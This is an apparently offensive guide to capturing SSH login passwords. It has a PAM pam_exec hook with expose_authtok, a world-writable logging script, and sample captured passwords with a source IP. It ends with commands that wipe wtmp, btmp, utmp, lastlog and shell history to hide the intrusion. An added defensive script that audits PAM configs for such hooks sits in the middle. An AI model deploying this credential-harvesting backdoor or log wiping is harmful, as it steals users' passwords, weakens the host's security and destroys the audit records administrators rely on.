Capturing passwords with PAM
1. Make sure UsePAM yes is set in sshd_config
vi /etc/ssh/sshd_config
UsePAM yes
2. Add the following line to /etc/pam.d/sshd
auth optional pam_exec.so quiet expose_authtok /usr/src/debug/sshd.sh
3. Contents of /usr/src/debug/sshd.sh
#!/bin/sh
echo "$(date) $PAM_USER $(cat -) $PAM_RHOST $PAM_RUSER" >> /usr/src/debug/sshd.log
4. Set permissions
chmod 777 /usr/src/debug/sshd.sh
5. Check the result
cat /usr/src/debug/sshd.log
Sat Nov 29 18:50:01 CST 2025 root Abc@123123 1.13.253.231
Sat Nov 29 18:50:03 CST 2025 root Qa12345678 1.13.253.231
Sat Nov 29 18:50:07 CST 2025 root Merlin01 1.13.253.231
Sat Nov 29 18:50:11 CST 2025 root 123456xX 1.13.253.231
6. Finally, compare to see which IP logged in successfully
-bash-4.2# w
18:54:19 up 236 days, 21:10, 1 user, load average: 0.10, 0.10, 0.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 127.0.0.1 18:27 3.00s 0.02s 0.00s w
-bash-4.2# last
root pts/1 127.0.0.1 Sat Nov 29 18:27 still logged in
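For checking a host for the hook set up in steps 2 to 4, the following added example (not part of the original post) lists every active pam_exec.so line in a PAM directory that uses expose_authtok and reports whether the program it runs is missing, world-writable (as after the chmod 777 in step 4) or restricted. The function names and the sample files are constructed for illustration.

```shell
# Added example, not from the original post. Function names and the sample
# files built at the bottom are constructed for illustration.

# Print "file:line:program" for each active pam_exec.so line that receives
# the password on stdin (expose_authtok).
scan_pam_exec() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        awk -v file="$f" '
            /^[ \t]*#/ { next }    # commented-out line
            /pam_exec\.so/ && /expose_authtok/ {
                prog = "-"; seen = 0
                for (i = 1; i <= NF; i++) {
                    if ($i ~ /pam_exec\.so$/) { seen = 1; continue }
                    if (seen && $i ~ /^\//) { prog = $i; break }  # first absolute path
                }
                print file ":" NR ":" prog
            }' "$f"
    done
}

# Classify the program PAM runs: a world-writable one lets any local user
# change code that is executed during authentication.
script_state() {
    [ -e "$1" ] || { echo missing; return; }
    if [ -n "$(find "$1" -prune -perm -0002 -print)" ]; then
        echo world-writable
    else
        echo restricted
    fi
}

# One line per finding: file:line:program:state
audit_pam_dir() {
    scan_pam_exec "$1" | while IFS=: read -r file line prog; do
        echo "$file:$line:$prog:$(script_state "$prog")"
    done
}

# Constructed sample input so the block runs offline; on a real host
# call: audit_pam_dir /etc/pam.d
demo=$(mktemp -d)
mkdir "$demo/pam.d"
printf '#!/bin/sh\n' > "$demo/hook.sh"; chmod 777 "$demo/hook.sh"
cat > "$demo/pam.d/sshd" <<EOF
auth required pam_sepermit.so
# auth optional pam_exec.so expose_authtok /tmp/old.sh
auth optional pam_exec.so quiet expose_authtok $demo/hook.sh
EOF
audit_pam_dir "$demo/pam.d"
```

The scan covers only files directly inside the directory it is given.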
============================================
Clearing records
> /var/log/wtmp
> /var/log/btmp
> /var/run/utmp
> /var/log/lastlog
cat /dev/null > ~/.bash_history
history -c
history -w